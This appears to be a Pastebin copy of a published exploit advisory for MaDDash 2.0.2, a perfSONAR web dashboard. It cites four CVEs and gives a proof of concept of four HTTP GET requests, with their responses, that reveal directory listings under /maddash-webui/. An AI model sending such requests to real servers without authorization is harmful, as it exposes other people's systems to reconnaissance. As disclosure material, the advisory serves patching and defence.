SHARE
TWEET

MaDDash 2.0.2 - Directory Listing

ManhNho Jun 17th, 2018 (edited) 560 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: MaDDash 2.0.2 - Directory Listing
  2. # Date: 2018-06-18
  3. # Vendor: perfSONAR
  4. # Download Link: https://github.com/esnet/maddash/archive/master.zip
  5. # Version: 2.0.2
  6. # Exploit Author: ManhNho
  7. # CVE: CVE-2018-12522,CVE-2018-12523,CVE-2018-12524,CVE-2018-12525
  8. # Category: Webapps
  9. # Tested on: Windows 7
  10.  
  11. --- Description ---
  12. A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers.
  13. A directory listing provides an attacker with the complete index of all the resources located inside of the directory.
  14. The specific risks and consequences vary depending on which files are listed and accessible.
  15.  
  16. ---Affected items---
  17. http://127.0.0.1/maddash-webui/etc/
  18. http://127.0.0.1/maddash-webui/lib/
  19. http://127.0.0.1/maddash-webui/images/
  20. http://127.0.0.1/maddash-webui/style/
  21.  
  22. --- PoC ---
  23.  
  24. [*] Request 1:
  25. GET /maddash-webui/etc/ HTTP/1.1
  26. Host: 127.0.0.1
  27. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  28. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  29. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  30. Accept-Encoding: gzip, deflate
  31. Cookie: color=Gray Unknown
  32. Connection: close
  33. Upgrade-Insecure-Requests: 1
  34. Cache-Control: max-age=0
  35.  
  36. [*] Response 1:
  37. HTTP/1.1 200 OK
  38. Date: Sun, 17 Jun 2018 19:48:30 GMT
  39. Server: Apache/2.2.15 (CentOS)
  40. Content-Length: 876
  41. Connection: close
  42. Content-Type: text/html;charset=UTF-8
  43.  
  44. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  45. <html>
  46.  <head>
  47.   <title>Index of /maddash-webui/etc</title>
  48.  </head>
  49.  <body>
  50. <h1>Index of /maddash-webui/etc</h1>
  51. --------------------------------------------------------------------------------------
  52.  
  53. [*] Request 2:
  54. GET /maddash-webui/lib/ HTTP/1.1
  55. Host: 127.0.0.1
  56. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  57. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  58. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  59. Accept-Encoding: gzip, deflate
  60. Cookie: color=Gray Unknown
  61. Connection: close
  62. Upgrade-Insecure-Requests: 1
  63. Cache-Control: max-age=0
  64.  
  65. [*] Response 2:
  66. HTTP/1.1 200 OK
  67. Date: Sun, 17 Jun 2018 19:48:31 GMT
  68. Server: Apache/2.2.15 (CentOS)
  69. Content-Length: 2555
  70. Connection: close
  71. Content-Type: text/html;charset=UTF-8
  72.  
  73. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  74. <html>
  75.  <head>
  76.   <title>Index of /maddash-webui/lib</title>
  77.  </head>
  78.  <body>
  79. <h1>Index of /maddash-webui/lib</h1>
  80. --------------------------------------------------------------------------------------
  81.  
  82. [*] Request 3:
  83. GET /maddash-webui/style/ HTTP/1.1
  84. Host: 127.0.0.1
  85. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  86. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  87. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  88. Accept-Encoding: gzip, deflate
  89. Cookie: color=Gray Unknown
  90. Connection: close
  91. Upgrade-Insecure-Requests: 1
  92.  
  93. [*] Response 3:
  94. HTTP/1.1 200 OK
  95. Date: Sun, 17 Jun 2018 19:52:51 GMT
  96. Server: Apache/2.2.15 (CentOS)
  97. Content-Length: 1928
  98. Connection: close
  99. Content-Type: text/html;charset=UTF-8
  100.  
  101. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  102. <html>
  103.  <head>
  104.   <title>Index of /maddash-webui/style</title>
  105.  </head>
  106.  <body>
  107. <h1>Index of /maddash-webui/style</h1>
  108. --------------------------------------------------------------------------------------
  109.  
  110. [*] Request 4:
  111. GET /maddash-webui/images/ HTTP/1.1
  112. Host: 127.0.0.1
  113. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
  114. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  115. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  116. Accept-Encoding: gzip, deflate
  117. Cookie: color=Gray Unknown
  118. Connection: close
  119. Upgrade-Insecure-Requests: 1
  120.  
  121. [*] Response 4:
  122. HTTP/1.1 200 OK
  123. Date: Sun, 17 Jun 2018 19:53:02 GMT
  124. Server: Apache/2.2.15 (CentOS)
  125. Content-Length: 2143
  126. Connection: close
  127. Content-Type: text/html;charset=UTF-8
  128.  
  129. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  130. <html>
  131.  <head>
  132.   <title>Index of /maddash-webui/images</title>
  133.  </head>
  134.  <body>
  135. <h1>Index of /maddash-webui/images</h1>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top